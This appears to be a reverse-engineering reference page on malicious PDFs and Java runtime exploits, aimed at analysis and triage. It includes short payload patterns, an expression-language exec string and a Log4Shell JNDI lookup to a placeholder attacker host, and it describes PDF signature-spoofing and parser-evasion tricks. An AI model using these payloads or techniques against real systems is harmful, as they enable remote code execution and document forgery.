Background · 6 Reverse Engineering, Binary & Malware

Document & Runtime Exploits.

PDF as a delivery vehicle (structure, script extraction, parser quirks) and the Java-runtime exploit reference — historical and current patterns, with what each reveals about the deployed JRE.

PDF — structure

File layout. Header (%PDF-1.x), body (numbered objects), xref table, trailer with root object reference. peepdf / pdfid / pdf-parser for structural analysis.
Object types of interest.
- /JavaScript + /JS — JS payload (the obvious one).
- /EmbeddedFile — attached payload (dropper).
- /OpenAction, /AA — auto-trigger on open.
- /Launch — launch external app (mostly killed by modern viewers).
- /RichMedia — embedded Flash (historical; still in old samples).
- /SubmitForm — submit form to attacker URL.
Suspicious indicators. Mismatch between declared object count and actual; massive object count for a "small" PDF; encoded streams (/Filter /FlateDecode /ASCIIHexDecode chained).

PDF — script extraction

pdfid file.pdf shows counts of suspicious keywords.
pdf-parser -f file.pdf lists objects with their filtered content.
Find object containing /JS or /JavaScript — extract content.
Decode with js-beautify; then deobfuscate (often app.alert(unescape("%u...")) shellcode).
Run extracted JS in a sandboxed JS interpreter (spidermonkey) with stubbed PDF-specific APIs to see decoded payload.

PDF — viewer parser disagreements

Adobe Reader vs Foxit vs browser-native. Each parses xref-corruption, multiple startxref entries, header in body, slightly differently. Attackers craft files that one viewer rejects (used by sandbox) and another accepts (used by victim).
Polyglot files. Valid PDF + valid ZIP + valid JPEG simultaneously. Different consumers see different content.
Sig bypass via incremental update. Original PDF signed; attacker appends incremental update changing rendered content; viewer shows updated content with green signature checkmark from original signature.

Java — historical exploit patterns

Applet sandbox escapes (2012–2014). CVE-2012-4681 (TrustedMethodChainsToTrue), CVE-2013-2423, CVE-2013-2465. Defined the era; pushed enterprises off browser-side Java.
JNLP / Web Start. Java Web Start let unsigned-but-trusted apps run outside sandbox. Multiple bypasses of the trust-prompt.
Browser plugin EOL. Modern browsers don't run Java. Pattern is historical for forensics; not current.

Java — current patterns

Deserialization gadget chains (still primary). readObject on attacker bytes + classpath containing gadget library (Commons Collections, Spring, Mozilla Rhino, Click). ysoserial generates the payload. JEP-290 filter rarely configured. See server-side-language-audits entry.
Expression-language injection. SpEL, OGNL, MVEL, Velocity. ${T(Runtime).getRuntime().exec('id')} patterns. Spring Framework CVE-2022-22965 (Spring4Shell) reachable via this surface.
Reflection misuse. Application accepts class names + method names from user input → instantiate arbitrary class. Often combined with deserialization to find gadgets dynamically.
JNDI lookup with attacker-controlled name (Log4Shell, CVE-2021-44228). ${jndi:ldap://attacker/x} resolved by Log4j → LDAP fetches Java class → loaded and instantiated → arbitrary RCE.

What each exploit tells you about the runtime

Exploit success against specific gadget chain → classpath confirmed to include that library + JRE version below the patch.
Log4Shell trigger → log4j-core 2.0–2.14.1 present.
Spring4Shell trigger → Spring framework with vulnerable binding behavior + JDK ≥ 9.
JNDI fetched but no class load → JNDI lookup enabled, JDK ≥ 8u191 disabling default LDAP class load. Still useful as DNS-callback proof.

Rule of thumbDocument-borne exploits are mostly social-engineering wrappers around an underlying runtime vuln. The PDF/Office/JNLP is the carrier; the actual exploit is in the embedded JS / macro / serialized payload. Triage the carrier; analyze the cargo.

Related notes in this domain

From reference to evidence